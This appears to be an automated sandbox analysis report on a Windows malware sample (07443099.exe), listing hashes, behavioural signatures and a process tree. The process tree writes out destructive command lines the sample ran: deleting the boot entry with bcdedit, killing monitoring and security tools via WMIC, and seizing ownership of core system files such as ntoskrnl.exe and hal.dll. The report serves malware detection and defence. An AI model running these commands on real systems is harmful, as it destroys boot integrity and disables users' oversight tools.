Analysis
- max time kernel: 99s
- max time network: 32s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 10/06/2023, 10:08
Static task: static1
Behavioral task: behavioral1
  Sample: 07443099.exe
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: 07443099.exe
  Resource: win10v2004-20230220-en
General
- Target: 07443099.exe
- Size: 247KB
- MD5: 733eb0ab951ae42a8d8cca413201e428
- SHA1: 640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
- SHA256: 52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
- SHA512: c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
- SSDEEP: 3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
- Possible privilege escalation attempt (25 IoCs)
  pid   Process
  1316  icacls.exe
  1072  icacls.exe
  1084  icacls.exe
  1488  takeown.exe
  1192  takeown.exe
  1880  icacls.exe
  1924  icacls.exe
  1732  icacls.exe
  1908  takeown.exe
  1172  takeown.exe
  1068  icacls.exe
  928   icacls.exe
  1208  icacls.exe
  1256  icacls.exe
  1124  takeown.exe
  792   takeown.exe
  1424  takeown.exe
  1792  takeown.exe
  1156  icacls.exe
  860   icacls.exe
  900   takeown.exe
  844   takeown.exe
  1916  takeown.exe
  1044  takeown.exe
  1852  takeown.exe
- Executes dropped EXE (2 IoCs)
  pid   Process
  1868  winconfig.exe
  620   DetectKey.exe
- Loads dropped DLL (1 IoCs)
  pid   Process
  1764  07443099.exe
- Modifies file permissions (1 TTPs, 25 IoCs)
  pid   Process
  1316  icacls.exe
  1192  takeown.exe
  1880  icacls.exe
  1924  icacls.exe
  900   takeown.exe
  1852  takeown.exe
  1156  icacls.exe
  1208  icacls.exe
  1256  icacls.exe
  1916  takeown.exe
  1044  takeown.exe
  844   takeown.exe
  1068  icacls.exe
  860   icacls.exe
  1084  icacls.exe
  1732  icacls.exe
  1124  takeown.exe
  1172  takeown.exe
  792   takeown.exe
  1792  takeown.exe
  928   icacls.exe
  1072  icacls.exe
  1908  takeown.exe
  1488  takeown.exe
  1424  takeown.exe
- Modifies boot configuration data using bcdedit (1 IoCs)
  pid   Process
  1488  bcdedit.exe
- Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  description                    ioc                  Process
  File opened for modification   \??\PhysicalDrive0   07443099.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid   Process
  620   DetectKey.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                           pid   Process
  Token: SeIncreaseQuotaPrivilege       1172  WMIC.exe
  Token: SeSecurityPrivilege            1172  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1172  WMIC.exe
  Token: SeLoadDriverPrivilege          1172  WMIC.exe
  Token: SeSystemProfilePrivilege       1172  WMIC.exe
  Token: SeSystemtimePrivilege          1172  WMIC.exe
  Token: SeProfSingleProcessPrivilege   1172  WMIC.exe
  Token: SeIncBasePriorityPrivilege     1172  WMIC.exe
  Token: SeCreatePagefilePrivilege      1172  WMIC.exe
  Token: SeBackupPrivilege              1172  WMIC.exe
  Token: SeRestorePrivilege             1172  WMIC.exe
  Token: SeShutdownPrivilege            1172  WMIC.exe
  Token: SeDebugPrivilege               1172  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1172  WMIC.exe
  Token: SeRemoteShutdownPrivilege      1172  WMIC.exe
  Token: SeUndockPrivilege              1172  WMIC.exe
  Token: SeManageVolumePrivilege        1172  WMIC.exe
  Token: 33                             1172  WMIC.exe
  Token: 34                             1172  WMIC.exe
  Token: 35                             1172  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1172  WMIC.exe
  Token: SeSecurityPrivilege            1172  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1172  WMIC.exe
  Token: SeLoadDriverPrivilege          1172  WMIC.exe
  Token: SeSystemProfilePrivilege       1172  WMIC.exe
  Token: SeSystemtimePrivilege          1172  WMIC.exe
  Token: SeProfSingleProcessPrivilege   1172  WMIC.exe
  Token: SeIncBasePriorityPrivilege     1172  WMIC.exe
  Token: SeCreatePagefilePrivilege      1172  WMIC.exe
  Token: SeBackupPrivilege              1172  WMIC.exe
  Token: SeRestorePrivilege             1172  WMIC.exe
  Token: SeShutdownPrivilege            1172  WMIC.exe
  Token: SeDebugPrivilege               1172  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1172  WMIC.exe
  Token: SeRemoteShutdownPrivilege      1172  WMIC.exe
  Token: SeUndockPrivilege              1172  WMIC.exe
  Token: SeManageVolumePrivilege        1172  WMIC.exe
  Token: 33                             1172  WMIC.exe
  Token: 34                             1172  WMIC.exe
  Token: 35                             1172  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1348  WMIC.exe
  Token: SeSecurityPrivilege            1348  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1348  WMIC.exe
  Token: SeLoadDriverPrivilege          1348  WMIC.exe
  Token: SeSystemProfilePrivilege       1348  WMIC.exe
  Token: SeSystemtimePrivilege          1348  WMIC.exe
  Token: SeProfSingleProcessPrivilege   1348  WMIC.exe
  Token: SeIncBasePriorityPrivilege     1348  WMIC.exe
  Token: SeCreatePagefilePrivilege      1348  WMIC.exe
  Token: SeBackupPrivilege              1348  WMIC.exe
  Token: SeRestorePrivilege             1348  WMIC.exe
  Token: SeShutdownPrivilege            1348  WMIC.exe
  Token: SeDebugPrivilege               1348  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1348  WMIC.exe
  Token: SeRemoteShutdownPrivilege      1348  WMIC.exe
  Token: SeUndockPrivilege              1348  WMIC.exe
  Token: SeManageVolumePrivilege        1348  WMIC.exe
  Token: 33                             1348  WMIC.exe
  Token: 34                             1348  WMIC.exe
  Token: 35                             1348  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1348  WMIC.exe
  Token: SeSecurityPrivilege            1348  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1348  WMIC.exe
  Token: SeLoadDriverPrivilege          1348  WMIC.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  description                         pid   Process        procid_target
  PID 1764 wrote to memory of 1868    1764  07443099.exe   29
  PID 1764 wrote to memory of 1868    1764  07443099.exe   29
  PID 1764 wrote to memory of 1868    1764  07443099.exe   29
  PID 1764 wrote to memory of 1868    1764  07443099.exe   29
  PID 1868 wrote to memory of 520     1868  winconfig.exe  30
  PID 1868 wrote to memory of 520     1868  winconfig.exe  30
  PID 1868 wrote to memory of 520     1868  winconfig.exe  30
  PID 1868 wrote to memory of 520     1868  winconfig.exe  30
  PID 520 wrote to memory of 620      520   cmd.exe        32
  PID 520 wrote to memory of 620      520   cmd.exe        32
  PID 520 wrote to memory of 620      520   cmd.exe        32
  PID 520 wrote to memory of 620      520   cmd.exe        32
  PID 520 wrote to memory of 1488     520   cmd.exe        33
  PID 520 wrote to memory of 1488     520   cmd.exe        33
  PID 520 wrote to memory of 1488     520   cmd.exe        33
  PID 520 wrote to memory of 1172     520   cmd.exe        35
  PID 520 wrote to memory of 1172     520   cmd.exe        35
  PID 520 wrote to memory of 1172     520   cmd.exe        35
  PID 520 wrote to memory of 1348     520   cmd.exe        37
  PID 520 wrote to memory of 1348     520   cmd.exe        37
  PID 520 wrote to memory of 1348     520   cmd.exe        37
  PID 520 wrote to memory of 900      520   cmd.exe        38
  PID 520 wrote to memory of 900      520   cmd.exe        38
  PID 520 wrote to memory of 900      520   cmd.exe        38
  PID 520 wrote to memory of 1392     520   cmd.exe        39
  PID 520 wrote to memory of 1392     520   cmd.exe        39
  PID 520 wrote to memory of 1392     520   cmd.exe        39
  PID 520 wrote to memory of 1956     520   cmd.exe        40
  PID 520 wrote to memory of 1956     520   cmd.exe        40
  PID 520 wrote to memory of 1956     520   cmd.exe        40
  PID 520 wrote to memory of 1408     520   cmd.exe        41
  PID 520 wrote to memory of 1408     520   cmd.exe        41
  PID 520 wrote to memory of 1408     520   cmd.exe        41
  PID 520 wrote to memory of 1548     520   cmd.exe        42
  PID 520 wrote to memory of 1548     520   cmd.exe        42
  PID 520 wrote to memory of 1548     520   cmd.exe        42
  PID 520 wrote to memory of 740      520   cmd.exe        43
  PID 520 wrote to memory of 740      520   cmd.exe        43
  PID 520 wrote to memory of 740      520   cmd.exe        43
  PID 520 wrote to memory of 1900     520   cmd.exe        44
  PID 520 wrote to memory of 1900     520   cmd.exe        44
  PID 520 wrote to memory of 1900     520   cmd.exe        44
  PID 520 wrote to memory of 1136     520   cmd.exe        45
  PID 520 wrote to memory of 1136     520   cmd.exe        45
  PID 520 wrote to memory of 1136     520   cmd.exe        45
  PID 520 wrote to memory of 928      520   cmd.exe        46
  PID 520 wrote to memory of 928      520   cmd.exe        46
  PID 520 wrote to memory of 928      520   cmd.exe        46
  PID 520 wrote to memory of 328      520   cmd.exe        47
  PID 520 wrote to memory of 328      520   cmd.exe        47
  PID 520 wrote to memory of 328      520   cmd.exe        47
  PID 520 wrote to memory of 2000     520   cmd.exe        48
  PID 520 wrote to memory of 2000     520   cmd.exe        48
  PID 520 wrote to memory of 2000     520   cmd.exe        48
  PID 520 wrote to memory of 1916     520   cmd.exe        49
  PID 520 wrote to memory of 1916     520   cmd.exe        49
  PID 520 wrote to memory of 1916     520   cmd.exe        49
  PID 520 wrote to memory of 524      520   cmd.exe        50
  PID 520 wrote to memory of 524      520   cmd.exe        50
  PID 520 wrote to memory of 524      520   cmd.exe        50
  PID 520 wrote to memory of 1768     520   cmd.exe        51
  PID 520 wrote to memory of 1768     520   cmd.exe        51
  PID 520 wrote to memory of 1768     520   cmd.exe        51
  PID 520 wrote to memory of 844      520   cmd.exe        52
Processes (process tree; the bracketed number is the nesting depth, each entry lists image path, PID, command line and the signatures that fired on it)

[1] C:\Users\Admin\AppData\Local\Temp\07443099.exe  (PID 1764)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\07443099.exe"
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\Temp\winconfig.exe  (PID 1868)
      cmdline: "C:\Windows\Temp\winconfig.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe  (PID 520)
        cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\451C.tmp\451D.tmp\451E.bat C:\Windows\Temp\winconfig.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Roaming\DetectKey.exe  (PID 620)
          cmdline: "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
          - Executes dropped EXE
          - Suspicious behavior: CmdExeWriteProcessMemorySpam
      [4] C:\Windows\system32\bcdedit.exe  (PID 1488)
          cmdline: bcdedit /delete {current}
          - Modifies boot configuration data using bcdedit
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1172)
          cmdline: wmic process where name='taskmgr.exe' delete /nointeractive
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1348)
          cmdline: wmic process where name='perfmon.exe' delete /nointeractive
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 900)
          cmdline: wmic process where name='mmc.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1392)
          cmdline: wmic process where name='PartAssist.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1956)
          cmdline: wmic process where name='control.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1408)
          cmdline: wmic process where name='ProcessHacker.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1548)
          cmdline: wmic process where name='Security Task Manager.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 740)
          cmdline: wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1900)
          cmdline: wmic process where name='CCleaner.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1136)
          cmdline: wmic process where name='procexp.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 928)
          cmdline: wmic process where name='procexp64.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 328)
          cmdline: wmic process where name='procexp64a.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 2000)
          cmdline: wmic process where name='logonui.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1916)
          cmdline: wmic process where name='regedit.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 524)
          cmdline: wmic process where name='iexplore.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1768)
          cmdline: wmic process where name='chrome.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 844)
          cmdline: wmic process where name='firefox.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1516)
          cmdline: wmic process where name='opera.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1632)
          cmdline: wmic process where name='edge.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1080)
          cmdline: wmic process where name='msedge.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 888)
          cmdline: wmic process where name='brave.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 288)
          cmdline: wmic process where name='wmplayer.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1352)
          cmdline: wmic process where name='notepad.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1316)
          cmdline: wmic process where name='notepad++.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1716)
          cmdline: wmic process where name='taskmgr.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1304)
          cmdline: wmic process where name='perfmon.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1604)
          cmdline: wmic process where name='logonui.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 852)
          cmdline: wmic process where name='ProcessHacker.exe' delete /nointeractive
      [4] C:\Windows\system32\takeown.exe  (PID 1124)
          cmdline: takeown /f "C:\Windows\system32\taskmgr.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1908)
          cmdline: takeown /f "C:\Windows\system32\hal.dll"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1916)
          cmdline: takeown /f "C:\Windows\system32\winload.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1488)
          cmdline: takeown /f "C:\Windows\system32\ntoskrnl.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1192)
          cmdline: takeown /f "C:\Windows\system32\perfmon.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1424)
          cmdline: takeown /f "C:\Windows\system32\resmon.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1172)
          cmdline: takeown /f "C:\Windows\system32\logonui.exe
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 792)
          cmdline: takeown /f "C:\Windows\system32\taskkill.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1792)
          cmdline: takeown /f "C:\Windows\system32\tasklist.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1044)
          cmdline: takeown /f "C:\Windows\system32\tskill.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 844)
          cmdline: takeown /f "C:\Windows\system32\logonui.exe"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 900)
          cmdline: takeown /f "C:\Program Files\Process Hacker 2"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe  (PID 1852)
          cmdline: takeown /f "C:\Windows\System32\drivers"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1404)
          cmdline: wmic process where name='taskmgr.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1260)
          cmdline: wmic process where name='perfmon.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1332)
          cmdline: wmic process where name='logonui.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1368)
          cmdline: wmic process where name='ProcessHacker.exe' delete /nointeractive
      [4] C:\Windows\system32\icacls.exe  (PID 1880)
          cmdline: icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1156)
          cmdline: icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1924)
          cmdline: icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1732)
          cmdline: icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1208)
          cmdline: icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1316)
          cmdline: icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1256)
          cmdline: icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1068)
          cmdline: icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 928)
          cmdline: icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 860)
          cmdline: icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1072)
          cmdline: icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe  (PID 1084)
          cmdline: icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 2028)
          cmdline: wmic process where name='taskmgr.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1612)
          cmdline: wmic process where name='perfmon.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 1908)
          cmdline: wmic process where name='logonui.exe' delete /nointeractive
      [4] C:\Windows\System32\Wbem\WMIC.exe  (PID 524)
          cmdline: wmic process where name='ProcessHacker.exe' delete /nointeractive
      [4] C:\Windows\system32\cmd.exe  (PID 1508)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 792)
          cmdline: cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 1792)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 612)
          cmdline: cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 1952)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 896)
          cmdline: cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 1820)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1852)
          cmdline: cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 1572)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1392)
          cmdline: cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 1404)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1080)
          cmdline: cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 2012)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1956)
          cmdline: cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 888)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1896)
          cmdline: cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 1624)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1616)
          cmdline: cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 856)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1548)
          cmdline: cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
      [4] C:\Windows\system32\cmd.exe  (PID 740)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
      [4] C:\Windows\system32\cacls.exe  (PID 1880)
          cmdline: cacls "C:\Windows\System32\drivers" /grant "everyone":F
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 5KB
  MD5: a645734f3bf4a2682cbaf546789ec0c4
  SHA1: fafcc11909412bf51f217e12dfaa93a15181a3e2
  SHA256: 3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
  SHA512: efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
- Filesize: 87KB
  MD5: aba9a3cf4e1db4602c25405987b809a6
  SHA1: 6cd545ea023ce9cdfe76607c6801cc11ff7d9e80
  SHA256: 490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
  SHA512: e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
- Filesize: 87KB
  MD5: aba9a3cf4e1db4602c25405987b809a6
  SHA1: 6cd545ea023ce9cdfe76607c6801cc11ff7d9e80
  SHA256: 490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
  SHA512: e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
- Filesize: 139KB
  MD5: 11d457ee914f72a436fa4a8a8f8446dd
  SHA1: d0308ca82ed9716b667e8e77e9ae013b9af44116
  SHA256: c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
  SHA512: 4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b
- Filesize: 139KB
  MD5: 11d457ee914f72a436fa4a8a8f8446dd
  SHA1: d0308ca82ed9716b667e8e77e9ae013b9af44116
  SHA256: c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
  SHA512: 4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b